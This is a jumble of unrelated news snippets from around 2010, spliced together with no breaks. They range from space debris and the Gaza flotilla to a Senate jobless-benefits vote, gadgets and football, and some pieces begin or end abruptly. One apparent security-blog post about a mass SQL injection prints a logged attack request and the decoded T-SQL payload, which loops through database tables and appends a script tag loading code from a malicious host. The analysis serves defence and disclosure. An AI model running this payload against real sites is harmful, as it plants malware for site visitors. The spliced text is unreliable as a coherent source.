The second plan came from NASA ’s Bacon , who outlined a scheme to launch a 10 - ton mother ship that would hold 10 additional tons of mass - produced nanosatellites , stored like larvae in a honeycombed nest .
Once released , the nanosats would approach objects , toss lightweight nets over them , and then tow the debris into the atmosphere .
Bacon ’s plan is suitable mainly for pieces of junk lighter than 2 pounds in low Earth orbit .
Heavier items — rocket stages , satellites — would remain .
He estimates that each launch of a mother ship would cost $ 100 million , with as many as 12 missions needed .
The third concept was from Rob Hoyt , CEO of Tethers Unlimited , a Seattle - area space contractor .
For the past 15 years , Hoyt has been developing a system called Rustler , to “ round up space trash [ for ] low Earth orbit remediation . ”
He envisions midsize space vehicles — 400 pounds or so — piggybacking on satellite launches .
Once in orbit , such a craft would sidle up to junk and attach an electrodynamic tether — a wire - mesh kite tail up to 6 miles long — then send an amp of current through the material .
The current would interact with Earth ’s magnetic field , producing a drag effect and lowering the debris into the atmosphere .
Hoyt ’s approach drew praise from Kessler and others for its simplicity and relatively low price .
According to Hoyt , a test mission to take out a few tons of trash could cost just tens of millions of dollars .
Which brings up the problem of how to pay for deploying any of these technologies .
One idea would be to assess a fee on commercial satellite companies — which would benefit , after all , from safer skies .
Eventually , aerospace firms may equip their satellites with built - in disposal devices so they can be pulled out of orbit when their missions are complete .
Hoyt has just such a product , called Terminator Tape , a 3 - pound package containing a tether that can be unfurled automatically using the spacecraft ’s own electronics .
By the end of the conference , there was a sense that removing the junk is actually possible .
“ I ’ve gone from being totally skeptical to thinking maybe something will work , ” Kessler says .
“ We can bring things down ; it ’s just going to cost a lot . ”
Eric Christiansen knows just how damaging space junk can be .
From his office at NASA ’s Johnson Space Center in Houston , he directs a team that studies what happens when orbiting objects get whacked , slammed , pierced , and pummeled .
His lab has a wonderfully badass name : the Hypervelocity Impact Technology Facility .
The impacting actually happens a few hundred miles away , at NASA ’s testing range near White Sands , New Mexico .
There , technicians operate a cannon that uses gunpowder and pressurized hydrogen to fire plastic slugs at shields and panels .
Just like real space junk , the projectiles can approach speeds of 5 miles per second .
Christiansen and his colleagues study the results and use their findings to help develop stronger materials and designs for spacecraft .
They ’re also working on shields that might provide protection from stray projectiles .
“ This is the lightest shield that will stop a 2 - centimeter projectile , ” he says , pointing to a multilayer Kevlar and ceramic panel for the ISS .
Some of the mangled hardware is on display at the space center .
The most treasured of these objects is a piece of window glass from a 1983 Challenger mission .
Dinged by debris , it entered the collection when Kessler worked at NASA .
“ Don gave this to me , ” Christiansen says , “ and he said , ‘ You protect this and leave it to the next guy . ' ”
Christiansen collaborates with the Orbital Debris Program Office , which does much of its work in a corrugated metal building .
The office — run by Kessler ’s successor , Nicholas L. Johnson — is improving its ability to forecast crashes and spot some of the smallest space bits using a huge telescope on a Chilean mountaintop , which will be joined in 2011 by a new scope on a Pacific atoll .
This happens to be the day after the Obama administration announced it was canceling Constellation , NASA ’s grand plan to return astronauts to the moon by 2020 .
Along with the final phase - out of the Space Shuttle Program and the move to privatize launches , it all seems to represent a massive resetting of NASA ’s priorities .
Perhaps that makes it the opportune time to get serious about tidying up the skies .
The main obstacle , of course , is funding .
But included in NASA ’s proposed 2011 budget is a first - ever provision to award $ 400,000 research grants for orbital debris removal and other projects .
The allocation would be part of a new “ mission directorate ” called Space Technology , funded to the tune of almost $ 5 billion over the next five years .
“ We ’re hoping NASA will be able to take charge , ” Star Technology ’s Pearson says .
For Donald Kessler , now 70 , that would be welcome news .
Standing on his back porch , he does n’t need his telescope to spot the man -made spacecraft whizzing overhead .
“ Anyone can see satellites with the naked eye , ” he says .
“ Several pass by every hour . ”
Sooner or later , he says , word will arrive that another one has been smashed and shattered , and the fragments will escalate the danger to all space missions .
The man with the syndrome named after him will keep watch and wait for the next call .
Evan I. Schwartz ( www.evanischwartz.com) wrote about the invention of television in issue 10.04 .
Share
tweet
This poor guy thought he was in for a nice relaxing night of raiding .
Unfortunately his crazy girlfriend had other plans .
Picture this , you step out for a few seconds to pick up some smokes , you come home and find that your level 80 is gone .
Your level 70 - something alt is gone .
All that ’s left is a lowbie Warlock .
I ’d freak the fuck out too .
I ’d go lay in bed , with the lights completely out , crying my eyes out and cuddling my Wind Rider Plushy .
What exactly was going through this guy ’s mind ?
Probably something like “ All of those wasted hours .
So… much … time .
RAAAAARG ! ” Not too mention that crazy biotch deleted all of his gear before erasing the character .
So even if Blizzard reinstates the toon , the character reappears with his last remaining gear .
Oy .
Link
On Tuesday the Saville Inquiry published its long - awaited report on Bloody Sunday when 13 people on a civil rights march were shot dead by paratroops in Londonderry , Northern Ireland .
Click through this guide to find out how the day unfolded .
On 30 January 1972 , 13 people were killed when soldiers from the British Parachute Regiment opened fire on a civil rights march in Derry .
The day became known as Bloody Sunday .
About 10,000 people gather in Creggan area to march to the Guildhall for a rally organised by the Northern Ireland Civil Rights Association to protest at internment without trial .
The Stormont government had banned such protests .
Army barricades block marchers from the centre .
They turn into Rossville Street .
In William Street some throw stones at soldiers who respond with rubber bullets , CS gas and a water cannon .
Two men are shot and wounded .
A unit of the 1st Batallion Parachute Regiment advances down William St and Rossville St with orders to arrest as many marchers as possible .
At 16.10 the shooting begins .
After 25 minutes of shooting , 13 marchers have been killed and 13 wounded , one of whom later dies .
The soldiers claimed they were fired upon first , but the marchers said the Army shot indiscriminately at unarmed civilians .
BACK {current} of {total} NEXT
Sources : Cain - key events of Bloody Sunday
Find out in detail what happened on the day in the Saville Report
What happened next
The events of Bloody Sunday caused shock and revulsion across the world .
In Dublin , a crowd of protesters burnt the British Embassy .
In Northern Ireland , it marked the effective end of the non-violent campaign for civil rights .
Some young people who had previously regarded themselves as non-political joined the IRA .
Two months after Bloody Sunday , the Stormont parliament which had ruled Northern Ireland since its creation in the 1920s was suspended and direct rule from London was imposed .
In April , the Widgery Inquiry concluded that the Paratroopers ' firing had " bordered on the reckless " .
It also concluded the soldiers had been fired upon first and some of the victims had handled weapons , despite evidence from witnesses who said the victims were unarmed civilians .
The Catholic community rejected these findings as a " whitewash " and began a long campaign for another inquiry .
In 1998 a fresh inquiry , headed by Lord Saville , was announced .
Senate blocks extension
Nearly one million US workers cut off unemployment benefits
By Patrick Martin
18 June 2010
With 12 Democrats joining a unanimous Republican bloc , the US Senate voted Wednesday to defeat a proposed extension of unemployment benefits for workers who have been jobless for nearly two years .
The bill would have extended unemployment benefits for those out of work more than six months , until November 30 .
In the two and a half weeks since June 1 , when the last extension expired , some 903,000 workers have seen their benefits cut off .
By June 26 , that number will top 1.2 million .
Meanwhile , the Labor Department reported that the number of new claims for unemployment compensation jumped to 472,000 last week , the highest figure in several months .
The result is that a Congress that rushed through a $ 700 billion bailout of Wall Street in October 2008 in a matter of days , and authorized a further financial windfall to the banks and speculators five months later , cannot bring itself to support even the most meager subsistence for the unemployed workers who are the victims , not the perpetrators , of the economic crisis .
The vote was taken under Senate rules , not to pass the legislation itself , but to “ waive budgetary discipline ” and allow passage by a simple majority rather than 60 votes out of 100 .
The result was 45 in favor and 52 against , with three senators absent .
Senate Majority Leader Harry Reid had already abandoned an effort to adopt a cloture motion , closing debate , for lack of the necessary 60 votes .
Three months ago a similar extension bill passed the Senate easily .
The unemployment extension is part of a larger bill that includes additional aid to state governments to cover Medicaid , the healthcare program for the poor , and to offset a potential 21 percent cut in reimbursements to doctors who treat Medicare patients .
The House of Representatives passed a version of the bill May 28 costing $ 113 billion , but without the Medicaid assistance to the states .
The Senate version includes the Medicaid support , and costs a total of $ 140 billion , which sparked the unanimous no vote of the Republicans , as well as the opposition of the 12 Democrats , mainly conservatives , but including liberals like Russ Feingold of Wisconsin .
According to press reports , leading Senate Democrats are seeking to win votes from the bill ’s opponents by eliminating a $ 25 a week increase in jobless benefits that was part of the 2009 stimulus package .
In other words , either all 10 million jobless workers would see a $ 25 cut in benefits , from checks averaging $ 309 a week , or benefits for the 5.7 million long - term unemployed would be cut off completely .
Either way , those deprived of work by the economic crisis of capitalism , the most vulnerable section of the working class , will be made to pay .
One of the dozen right - wing Democrats who voted against the bill , Senator Ben Nelson of Nebraska , reiterated his opposition to Capitol Hill reporters .
He cited concerns about the federal deficit , after rejecting a new version of the bill that would cost $ 20 billion less .
“ Borrowing and deficit spending at the point of an economic crisis — and we were in a severe one in late 2008 and early 2009 — is one thing , ” Nelson said .
“ But when you ’re in an economic recovery , as we are today , borrowing and deficit spending is another thing . ”
Another Democratic “ no ” vote , Senator Mary Landrieu of Louisiana , told Fox News through a spokesman that she was particularly opposed to a provision in the bill that would have raised taxes on the oil and gas industry from 8 cents a barrel to 49 cents , raising $ 18.3 billion to replenish the Oil Liability Trust Fund .
Besides the oil industry tax , there is enormous business opposition to a proposed increase in the tax on the compensation of hedge fund managers — much of it currently taxed not as income but at the much lower capital gains rate — as well as a tax increase on investment partnerships .
Lobbying against this provision was said to be especially heavy on the part of companies like Blackstone .
A Republican alternative , introduced by Senator John Thune of South Dakota , would have extended jobless benefits and selected tax credits for business , but at the price of a 5 percent across - the - board cut in all federal discretionary spending ( with the military - intelligence apparatus excluded , of course ) .
This was defeated by a 41 to 57 margin .
Big business politicians of both parties have expressed their disdain for the unemployed , suggesting that extended unemployment benefits , now set at 99 weeks , are encouraging jobless workers to stay home and not look for work .
Georgia Republican Congressman John Linder said that extended benefits were “ too much of an allure . ”
Senator Diane Feinstein , a multi-millionaire Democrat from California , complained , “ We have 99 weeks of unemployment insurance .
The question comes , how long do you continue that before people just do n’t go back to work at all ? ”
California has a 12.6 percent unemployment rate , with 880,000 workers unemployed for 27 weeks or more , and receiving extended benefits .
Senator Claire McCaskill , a Missouri Democrat with particularly close ties to the White House , voted against the unemployment extension and backed the $ 25 a week cut .
“ This is not something that can go on indefinitely , ” she said .
Otherwise , “ it begins to look like a brand - new level of entitlement program , which is something that we really can’t afford to do right now . ”
Reports in the corporate - controlled media invariably cite mass popular opposition to higher federal deficits as the reason for the shift by a section of the Democratic Party to opposing extended unemployment benefits .
However , the claim that working people are up in arms over deficit spending is a spurious one , identifying the media - promoted antics of the Tea Party and other right - wing groups as a genuine popular movement .
The same polls that document overwhelming popular hostility to the bailout of Wall Street and the Obama administration ’s kid - glove treatment of BP show that the vast majority believe that jobless benefits should be extended and that emergency measures should be taken to provide jobs for the unemployed .
While the White House and Congress wrangle over the smallest of subsistence measures for the jobless , neither party nor the corporate elite as a whole propose to do anything to provide jobs for the unemployed .
The Wall Street Journal reported last week that American corporations have increased their cash reserves to $ 1.84 trillion , the highest figure in history .
In other words , big business and the banks , after an unprecedented bailout by the public treasury , are hoarding the funds that could put millions back to work .
The cash reserves of major corporations have jumped 26 percent in one year , the largest percentage increase in nearly 60 years .
The cash reserves of working people , and particularly the unemployed , have not been so fortunate .
While the treatment of the unemployed is the most glaring expression of the callousness and indifference of the wealthy , the opposition to the Medicaid assistance to the states is not far behind .
Medicaid , which pays for medical care for the poor , is the largest single budgetary item in most states , with 80 percent of the cost borne by the federal government and 20 percent by the states .
Most US states must balance their books for a fiscal year that ends June 30 , and many have already included the promised Medicaid assistance as part of their financial planning .
After the House stripped the Medicaid spending from its version of the bill , Obama sent a letter to House and Senate leaders on June 13 , urging them to restore the aid to the states and warning that without it there would be “ massive layoffs of teachers , police and firefighters . ”
According to the National Governors Association , total state government spending has dropped for two years in a row , the first time such a decline has been recorded .
State governments eliminated $ 300 billion in cumulative deficits over this two - year period , through a combination of spending cuts and tax increases , usually in regressive sales and excise taxes .
A report issued by the Center on Budget and Policy Planning , a liberal Washington study group , warned that without federal aid , as many as 34 states could impose drastic and unprecedented budget cuts beginning July 1 , cutting as many as 900,000 jobs in education and other public services .
Already , 28 states have ordered across - the - board budget cuts , 22 states have imposed payless furloughs on employees , and 25 states and Puerto Rico have laid off state workers .
For Israel 's prime minister , Binyamin Netanyahu , last week should have been about repairing the diplomatic bridges damaged in a series of international encounters .
After visiting Canada at the start of the week , the acerbic leader 's next stop was to have been the crucial one – a visit to Washington to meet President Barack Obama .
This meeting was intended to heal the wounds caused by Israel 's announcement in March – in defiance of the US – that it planned to build large new settlements in the territories that it had occupied since the Six Day War in 1967 .
The plan was announced as US vice president Joe Biden arrived in Israel .
It was a calculated diplomatic snub , Netanyahu was told at the time , that had " humiliated " the US president .
As things turned out , Netanyahu did n't make it to Washington .
Relations now , if anything , are frostier than ever .
What put an end to Netanyahu 's trip is now well documented .
At 4.30 am on Sunday , dozens of Israeli naval commandos in Operation Sea Breeze boarded a flotilla of ships attempting to run Israel 's blockade of Gaza and deliver aid .
The mission left a trail of dead and wounded among the 600 activists on the lead ship , the Turkish flagged Mavi Marmara .
As news emerged of the disastrous raid , Netanyahu – who was staying at the official residence of Stephen Harper , the Canadian prime minister – found himself convening an all - night meeting with his team to calculate Israel 's response to the wave of international condemnation .
If Netanyahu and his senior advisers hoped the Marmara incident would quickly blow over , they were wrong .
The revelation that many of those killed – eight Turks and a US - Turkish citizen – were shot in the head at close range by members of Israel 's Shayetet 13 naval special forces team only exacerbated the sense of anger in many quarters , above all in Turkey .
And while Israeli diplomats and ministers have tried to spin the clash on the aid flotilla as either much ado about nothing , or as a justified response to violent and illegal actions by the activists , the diplomatic fallout is threatening to dwarf the international reaction to Israel 's war against Gaza last year .
Israel 's relationship with its closest Muslim ally , Turkey , has been pronounced fatally wounded .
A succession of European leaders , including David Cameron and Nicolas Sarkozy , have lined up to pronounce Israel 's long - term embargo of Hamas - run Gaza as unsustainable and indefensible .
Most serious of all for Netanyahu , Israel 's closest and most assiduous ally , the United States , has also endorsed that view , going out of its way to reveal that it had warned Jerusalem to show restraint when dealing with the six - ship convoy .
Behind the inevitable bluster , the real question many Israelis are now asking is : how did it come to this ?
The answer is that the bungled raid on the Mavi Marmara has been a powerful catalyst for the escalating sense of repugnance at Israel 's policy of collective punishment of the 1.5 million residents of Gaza , while sharply underlining the perception of the intransigence of Israel under Netanyahu .
It has also exposed how slow Israel 's leadership has been to appreciate the profound changes that it faces on the regional and international stage – and how it should respond to them .
Those changes were most starkly visible last week in Turkey .
Prime Minister Recep Tayyip Erdogan expressed it most forcefully in a televised speech last week : " You [ Israel ] killed 19 - year - old Furkan Dogan brutally .
Which faith , which holy book can be an excuse for killing him ?
I am speaking to them in their own language .
The sixth commandment says , ' Thou shalt not kill ' .
Did you not understand ?
I 'll say again .
I say in English , ' You shall not kill ' .
Did you still not understand ?
So I 'll say to you in your own language .
I say in Hebrew , ' Lo Tirtzakh ' . "
But if the assault on a Turkish - flagged ship , supported by a Turkish organisation , which led to the deaths of Turkish citizens , has been a major source of anger , it has not been the only one .
Another has been the sense that Israel has taken the relationship with Turkey as a " given " , even as the Nato member has sought to assert its increasing leadership in the Muslim world and as a bridge between east and west .
In recent years , an increasingly confident Turkey has denied the US permission to transport troops through its territory en route to the invasion of Iraq , and has pressed for a seat on the UN Security Council .
It has attempted mediation between Syria and Israel , while trying to build alliances with Iraq and Iran .
And it has used its position as Israel 's closest military ally in the Muslim world to launch increasingly sharp criticism of the Jewish state – not least over Gaza .
But if Turkey 's growing influence on the world stage has been recognised in the US as valuable , with recent visits both by secretary of state Hillary Clinton and Middle East envoy George Mitchell , that message has been missed in Israel .
That is certainly one problem , but it has not been the only one .
The Mavi Marmara incident has also directed a harsh light on the country 's increasingly fraught relationship with America .
And while many commentators in Israel last week were lamenting that the real problem was that they had failed to adequately explain themselves over the attack on the Mavi Marmara – and that bad diplomacy was really to blame – some at least have begun to recognise that unconditional US support should not be taken for granted .
They include the head of Israel 's foreign intelligence service , who warned that his country was " gradually turning from an asset of the United States to a burden " .
That fear has been fuelled by the White House 's attempts to strike a far sterner tone with Israel , a position that was evident before the flotilla crisis , when it was revealed that US officials had repeatedly pressed Israel not to over - react to the approach of the sea convoy to Gaza 's shores .
" We communicated with Israel through multiple channels many times regarding the flotilla .
We emphasised caution and restraint , given the anticipated presence of civilians , including American citizens , " a State Department spokesman said in a statement .
Other US officials , in off - the - record briefings and leaked comments to American newspapers , also have aired their frustrations with Israel 's conduct .
" There is no question that we need a new approach to Gaza , " one official told the New York Times .
That echoed comments by Hillary Clinton , who , immediately after the attack on the flotilla , called the situation in Gaza " unsustainable " .
That approach – of trying to get Israel to soften its attitude – has come as no great surprise to many Middle East watchers in Washington .
" It does not surprise me that the Obama administration is trying to urge Israel to better manage this , " said Danielle Pletka , vice president for foreign and defence policy studies at the American Enterprise Institute .
" The administration has tried to manage this mess .
They have tried hard to extricate Israel from the fiasco . "
Speaking to the Washington Post yesterday , Daniel Kurtzer , the former US ambassador to Israel , argued the problem was more fundamental .
" [ Israelis ] look at the world quite differently from the way from this president does , and they are not willing to just fall in line because he is the president .
Israel and the United States are seeing the threat environment in the region … in increasingly different ways .
And for the United States , that means Israel is a problem , as an ally heading in a very different direction . "
All of which leaves an isolated Israel in a deep dilemma , made all the more difficult because many Israelis do not understand the reason for the outrage .
" It 's good that they filmed it at least , " says one Israeli woman at Jerusalem 's Hebrew university gym last week , commenting on the footage of the assault playing on the screens overhead – a video clip released by the Israeli army which shows the activists attacking the Israeli troops with clubs and iron bars as they arrive on deck , claimed as evidence of a premeditated , violent attack .
Her friend , also watching , says : " But you know , I heard that overseas they still do n't believe us . "
The first woman lets out an exasperated gasp .
" How is that possible ? " she asks .
That , in microcosm , is the result of the assault on the flotilla – a widening chasm between Israel 's view of its actions and the way they are seen around the world .
Because the army is conscripted , Israeli society and its military are intimately bound and , as a consequence , the army is trusted to tell the truth .
What raises more eyebrows is the accompanying inability to see why the Israeli perspective on events might not echo globally .
In Israel , there is one explanation for rising hostility .
" What we are seeing around the flotilla incident is just an extension of something which has been there for some time , " says Danny Gillerman , former Israeli ambassador to the UN .
" It is an outrageous hypocrisy and double standard to revile Israel for these actions , when other countries in the same situation would do exactly the same , if not worse . "
Gillerman dismisses other nations ' anger that their citizens had been shot dead , hospitalised , or held without contact with the outside world at an Israeli desert prison facility .
" ' Foreign nationals ' or ' human rights activists ' are broadly and wrongly used terms , " he says .
" They were using clubs , trying to lynch and mob our soldiers . "
He does not hold Israel responsible for the now deteriorating relations with Turkey .
" [ The flotilla ] was organised by extreme , Islamic terror groups connected to al - Qaida and supported by the Turkish prime minster , who for some time has been steering his country into the arms of Iran and Syria , " says Gillerman .
" At the end of the day , it is up to Erdogan to decide if he wants to be part of the western world . "
Israeli politicians and analysts say that the country needs to fight harder on the diplomatic front , to redress the imbalance of opinion against the nation .
Labour MP Einat
Wilf raised this issue in Israel 's parliament last week .
" Israel is being threatened in two arenas , " she says .
" One is military , with which we are familiar and experienced , but the other one is intellectual , the arena in which the very idea that the Jewish people have the right to a homeland is attacked . "
She sees the flotilla as falling into that category .
Outside Israel , the flotilla is viewed very differently indeed : as a challenge to Israel 's stranglehold on Gaza , and as having been responsible for widespread awareness of an untenable siege .
It is that which Israel can not see .
And while Israel might not be able to break with its disconnected world view , it may yet be forced to break the blockade on Gaza .
A couple of guys in their early - 20s came up with a product intended for arthritis sufferers , but instead have managed to excite a lot more people in the process .
Yes , tea - drinkers can get excited too , especially by a mug / kettle mash - up .
Advertisement
Originally created for their National College of Art and Design course in Ireland , Ben Millett and Alan Harrison 's Kug project looks likely to hit stores this year .
Inspired by arthritis sufferers who find it difficult lifting a kettle heavy with water , they designed a mug which heats cold water , with the outside layer of the mug holding the heating filament .
When docked to the charging - base , it boils the water — and by the looks of their video it could potentially charge 'n boil by USB as well .
If Millett and Harrison have n't thought of that yet , that 's a freebie from me .
[ The Kug via Daily Mail via The Design Blog ]
Advertisement
Kug Ad from Ben Millett on Vimeo .
Yesterday , the world found out when the PlayStation Move is coming and how much it 's going to cost .
However , when the price tags popped up at the Sony press conference , there was a bit of grumbling from the audience .
In the United States , the PlayStation Move wand will cost $ 49.99 and the navigation controller – the little bit with an analog stick – will cost an additional $ 29.99 .
An $ 80 entry cost to Sony 's new method of control ?
People were n't thrilled .
However , it turns out that the navigation controller is n't a necessity .
If you want to , you can hold your SixAxis or DualShock 3 controller in your left hand and the PlayStation Move in your right and not miss a beat .
The navigation controller does have a few extra buttons on it , but the ones you need to play games – L1 , L2 and an analog stick – are all right where you need them on the SixAxis / DualShock 3's left side .
While holding a full - size controller with one hand might not be the most comfortable thing for long periods of time , it 's good to know that you can be frugal and get the most out of your PlayStation Move library .
Bayern Munich secured a domestic double with a convincing 4 - 0 victory over Werder Bremen in the German Cup final .
Van Gaal 's men remain on course for historic Treble
Danger
Bayern Munich secured a domestic double with a convincing 4 - 0 victory over Werder Bremen in the German Cup final .
In one of the most one - sided finals in recent memory the Bundesliga champions swept aside the team that finished the season in third place , confirming their clear superiority in German football .
Arjen Robben broke the deadlock with a penalty in the 35th minute before Ivica Olic added a second early in the second half .
Franck Ribery got his name on the scoresheet after just over an hour and Bastian Schweinsteiger rounded things off in the 84th minute after Thorsten Frings had been shown a red card on a very disappointing evening for Bremen .
Bayern now head to Madrid looking to complete a historic treble with victory over Inter Milan in the UEFA Champions League final next Saturday having sent a fearsome warning to their Serie A rivals .
Bayern never let Bremen into the game from start to finish and the biggest surprise was how long it actually took them to go ahead .
Olic missed an open goal in the 24th minute before Robben placed his shot over an empty net from the edge of the penalty area on the half - hour mark .
They went in front in the 35th minute when Robben converted a penalty after Per Mertesacker handled the ball in the area , and there was no looking back .
Olic added the second in the 52nd minute when he poked a corner in at the near post before a fine counter - attack with Mark van Bommel sending the ball into the path of Ribery , who broke the offside trap before placing his shot coolly past Tim Wiese , made it three in the 63rd minute .
Bayern goalkeeper Hans - Jorg Butt cleared his only real moment of danger in the 65th minute as he tipped Claudio Pizarro 's header over .
Former Bayern players Tim Borowski and Frings manifested their frustration in fouls with the latter picking up two yellow cards to head for an early bath in the 77th minute .
And Schweinsteiger provided the perfect ending with the fourth in the 82nd minute , chesting a finely lofted pass from Philipp Lahm down before poking his shot past Wiese from 11 yards .
A BRITISH man kept his girlfriend 's corpse on a couch for 10 months - masking the smell of her decomposing flesh with air fresheners .
Police arrested Gabriel Brown , 54 , on suspicion of murder in December 2009 after the corpse of Lynn Warman , 37 , was discovered surrounded by air fresheners at her home in West Sussex , southern England .
Mr Brown claimed recovering drug addict Ms Warman , who he lived with , had fallen the night of February 9 2009 .
He said he woke the next day to find her dead , but was too grief - stricken to contact police , The Metro newspaper reported .
The murder suspect was himself found dead in January this year after bleeding to death while on police bail , Horsham Magistrates '
Court coroner heard .
An autopsy on Ms Warman failed to find a cause of death because of the length of time she had been dead .
An inquest into Mr Brown 's death will take place later this year .
There was no evidence she had been in a violent struggle and there was a possibility she died in the position she was found on the couch .
A former neighbour said : " Gabriel and Lynn had their ups and downs like any couple but they seemed happy a lot of the time .
It ’s horrible to think she lay there for nearly a year as he lived in the same house .
" The smell must have been terrible .
I hope they can both now rest in peace . "
Originally published as Dead girlfriend kept on couch for months
It may not be sport related but it 's unquestionably the headline of the day .
H/T - twitter.com/WillStLeger
Advertisement
Full Article here
14 SHARES Facebook Twitter
An incredibly large number of sites have been hacked in the last day with a malware script pointing to http://ww.robint.us/u.js.
Not only small sites , but some big ones got hit as well :
http://www.intljobs.org ( still hacked )
http://www.servicewomen.org ( still hacked )
http://online.wsj.com ( partially fixed )
http://www.asbmb.org
http://www.lotl.com
http://acsi.org/
http://www.cinemathequeontario.ca
http://www.plazakvinna.com
http://www.delawareriverkeeper.org/
http://www.traveldaily.co.uk
http://www.thepaddockarea.com
http://www.ex-designz.net
http://www.historyasia.com/
http://www.montrealmetropolis.ca
http://www.charlottelive.org
http://www.cebes.org.br
How many sites got infected ?
According to Google over * 114.000 different pages have been infected .
Wow !
Update 09/06/10 – not 1,000,000 + like we originally reported , sorry – bad google - fu .
What do all these sites have in common ?
They are all hosted on IIS servers and using ASP .
net .
This is the output of our scanner against www.intljobs.org:
This is the same attack reported by Sophos yesterday that hacked the Jerusalem Post .
Update 09/06/10 – Dale Neufeld from NSM Junkie was able to collect logs and packet dump from the attack .
This is what he found :
Original web request ( payload truncated for readability ) :
2010-06-07 13:31:15 W3SVC1 webserver 192.168.1.10 GET / page.aspx utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100×200′;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C6152652040742076……..
6F523B2D2D%20eXEc(@s ) – 80 – 121.xx.xxx.xx HTTP/1.1 Mozilla/4.0 +( compatible ;+MSIE+7.0 ; + Windows + NT+5.1;+.NET+CLR+1.1.4322 ) – – www.website.com 200 0 0 32068 1685 0
When we pull this apart we have :
dEcLaRe @s vArChAr ( 8000 )
set @s=0x6445634C6152652040742076……..6F523B2D2D
eXEc(@s ) –
So they ’re essentially setting up the varaible ‘ @s ’ and executing it .
Next we decode the variable ‘ @s ’ :
0xdEcLaRe @t vArChAr ( 255 ) , @c vArChAr ( 255 ) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE , b.nAmE FrOm sYsObJeCtS a, sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe=’u’ AnD ( b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167 ) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t , @c while (@@fEtCh_status=0 ) bEgIn exec(‘ UpDaTe [‘+@t +’]
sEt [ ‘+@c+’] =rtrim( convert( varchar( 8000 ) , [‘+@c + ’ ] ) ) +
cAsT( 0x3C736372697074207372633D687474703A2F2F77772E726F62696
E742E75732F752E6A733E3C2F7363726970743E aS vArChAr ( 51 ) ) where [ ‘+@c + ’ ] not like ” %robint % ” ’) fEtCh next FrOm tAbLe_cursoR iNtO @t , @c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR ; –
Now they ’re iterating through the sysobjects table to find out your actual table names and then iterating through those and appending the final encoded string .
cAsT( 0x3C736372697074207372633D687474703A2F2F77772E726F62696E742E75732
F752E6A733E3C2F7363726970743E
Decoded :
0x <script src=hxxp://ww.robint.us/u.js></script>
So it looks like a SQL injection attack against a third party ad management script .
If you have more information , please share with us .
If your site is hacked ( or contains malware ) , and you need help , send us an email at support@sucuri.net or visit our site : Sucuri Security .
We can get your sites clean up right away .
Also , consider checking out our site security monitoring .
We will monitor your sites 24×7 and alert you if it ever gets infected with malware , hacked or blacklisted .
Gran repercusión tuvo la fotografía publicada ayer en la tapa del diario Clarín .
Mostraba a un joven manifestante , en Bariloche , mientras le hacía pis a un grupo de policías .
La escena fue captada por el reportero gráfico Pepe Mateos , el mismo que cumplió un papel fundamental en la cobertura de la feroz represión policial del 26 de junio de 2002 .
Aquel día , en una protesta social , el gobierno del entonces presidente Eduardo Duhalde decidió impedir que un grupo piquetero cortara el puente Avellaneda .
La actuación de la Policía Bonaerense fue feroz , y terminó con el asesinato de dos manifestantes .
Eran Maximiliano Kosteki y Darío Santillán .
Pepe Mateos registró la muerte de Santillán .
Gracias a sus fotos –incorporadas a la causa judicial– , el comisario Alfredo Fanchiotti terminó preso por homicidio agravado por alevosía .
The Kindle is n't doing as well in academic environments as Amazon — and educators — had originally hoped .
The Darden Business School at the University of Virginia is near the end of its Kindle " experiment , " already concluding that students are not into the Kindle when it comes to classroom learning .
They are , however , fans of the Kindle when it comes to using it as a personal reading device .
Darden is one of a handful of schools that decided to give the larger - screened Kindle DX a trial run in select classes to see how well it fared in the academic environment .
And , it 's not the first to conclude that the Kindle is n't quite right for its students .
Arizona State University recently completed its own pilot program for the Kindle DX and was n't particularly impressed — the university also settled a lawsuit with the American Council for the Blind , agreeing to use devices that were more accessible to the blind in the future .
Princeton was also underwhelmed by its Kindle test ; one student described the device as a " poor excuse of an academic tool " in an interview with the Daily Princetonian .
Most Darden students seem to agree .
When asked to fill out a midterm survey on whether they would recommend the Kindle DX to incoming MBA students , 75 to 80 percent answered " no , " according to Darden director of MBA operations Michael Koenig .
On the flip side , 90 to 95 percent answered " yes " to whether they would recommend it to an incoming student as a personal reading device .
" What that says to me is that Amazon created a very well - designed consumer device for purchasing and reading digital books , magazines and newspapers , " Koenig staid in a statement .
" It ’s not yet ready for prime time in the highly engaged Darden business school classroom . "
Despite these results , the school is n't about to write off e-book readers — it just does n't think the Kindle is the right tool .
Darden hopes to have zero waste by 2020 and did note that there were a handful of " power user " students who used the Kindle exclusively for class .
Koenig said that the school is happy to offer its survey results to help Amazon identify which hardware and software tweaks might be necessary in order for the Kindle to better target higher education .
In the meantime , it 's clear that e-readers are taking off in nonacademic environments .
There has been a sudden surge of options available to customers in the form of the Nook , iPad , and Borders ' Kobo , as well as numerous others on the verge of release .
The Kindle enjoys the advantage of being one of the first major e-readers to hit the market , however , and is clearly doing well among the consumer market regardless of its academic shortcomings .
Verizon is n't a fan of the FCC 's proposed " third way " approach to network neutrality rules , and the company 's top policy people have suggested that the Internet needs an entirely new " policy framework . "
Such a framework will require massive wrangling in Congress , so in the short term , Verizon has partnered with Google and others to find a " consensus " framework for the short - term .
Is this a plan to avoid government rules on openness and turn the company into a maniacal bit - blocker ?
At a recent panel discussion ( PDF ) , Verizon policy exec Link Hoewing said no — the company has no wish to go down Comcast 's P2P blocking route , and he called out Comcast for its earlier approach .
" We came up with a standard that says any of the players on the Internet should not do anything that harms users or competition , " said Hoewing .
" And I think that 's a pretty important policy principle .
Because what it says is that , take the Comcast case , in that case , they were using reset packets and it clearly did harm a lot of users .
They were not able to use the Internet , some of them .
So that principle basically says you can't do that kind of thing , even if it 's network management to deal with congestion problems .
That 's not appropriate . "
Verizon is one of the sponsors of a new private - sector group that hopes to work out network management principles — and Hoewing argues that such a group could have saved Comcast from itself .
" So , for example , again the Comcast case , if there would have been an industry body , and I do n't just mean industry players , I mean also even advocates that have an engineering and technology background , they should be part of the process ; so should folks in the academic world .
But they should be able to meet regularly and look at some of these issues .
So Comcast could have come in and said , ' Look , we 've got a congestion problem .
It 's severe , it 's caused , we think , by P2P .
How do we deal with this ?
